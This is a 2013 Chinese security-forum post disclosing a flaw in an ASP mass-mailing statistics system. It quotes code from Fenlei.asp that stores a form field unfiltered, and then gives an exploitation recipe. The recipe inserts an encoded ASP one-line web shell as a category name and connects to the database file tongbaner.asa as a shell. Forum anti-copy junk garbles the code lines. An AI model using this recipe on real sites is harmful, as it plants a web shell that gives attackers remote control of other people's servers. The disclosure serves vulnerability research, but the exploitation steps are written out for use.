找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2140|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp / [' K/ x4 p: w& g3 g2 `) y

0 d0 O6 F8 x0 \9 r% O+ zIF Request.QueryString("Action")="del" Then 9 E" L* O& x' e/ K5 f& O8 e: O
ID=Request.QueryString("ID") % p) C. C' e4 v/ @5 Y9 t9 Z/ H/ S0 K# P
IF Countss ("tui","Fenlei",ID )<>0 then
0 z1 a9 L& L% I'略
7 U. s5 U1 D* i/ aIF Request.QueryString("Action")="Add" Then
- X5 Q! W# w5 f" _; sTname=Request.Form("Typename")
4 \0 j. C6 e  r7 G, a: c- {8 KSet Rs=Server.CreateObject("adodb.Recordset") % A2 C7 G, y2 [  ~, b3 ]
Sql="Select * From Fenlei Order by id Desc "
: e1 }0 g4 N, k) L; z& e# }4 d+ d: YRs.Open Sql,Conn,1,3 2 N* e' {9 O( v7 M3 ]$ g4 c. X$ R2 |! f
Rs.Addnew
  ^" d& E! U+ u2 |4 T2 k" cRs("Typename")=Tname . s( |* b; W8 ^# `! u' y  T" p
'略
6 m1 m4 s/ Y+ x7 K8 ^1 w4 r- C& ^% }Set Rs=Server.CreateObject("adodb.Recordset")
) }( f4 c* g- `" t# r% K# fSql="Select * From Fenlei Order by id Desc " 4 \$ v; ?; t7 `9 d" [( u6 L  h2 H2 O
Rs.Open Sql,Conn,1,1 2 u. ?* S+ [% ]4 t6 ~" @
'略
% z8 l: D% F) S' B3 ]* C4 A* i; L6 N%>' r* x+ T1 w7 N# g9 c. P
+ H+ k2 N1 Q& [3 R6 Q4 A8 I
# }2 k" Q# j! q6 @
* k4 Y" C, Y5 w$ r
没有过滤,直接写入数据库。$ m) I! n! P4 }! h6 [

$ N9 b' }7 U0 ?$ k9 |1 c2 U利用方法:) A6 t  }* D* a1 z9 }
( L% ?  k. ?1 V' t
插入:┼攠數畣整爠煥敵瑳∨≡┩>
* o" n) F5 r+ {2 R
: p4 s9 z7 w& J  A! E( L1 G$ S% b
  j. @- u7 O3 m  j) ]: ^( ?  e( W连接: http://www.xxx.com/###tongbaner.asa
! f; z# [0 N1 P# s( u) r'默认安装文件: , d8 o* S. v7 N- m
'install.asp
: [$ g# Q1 Q' I3 s% O$ l% s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表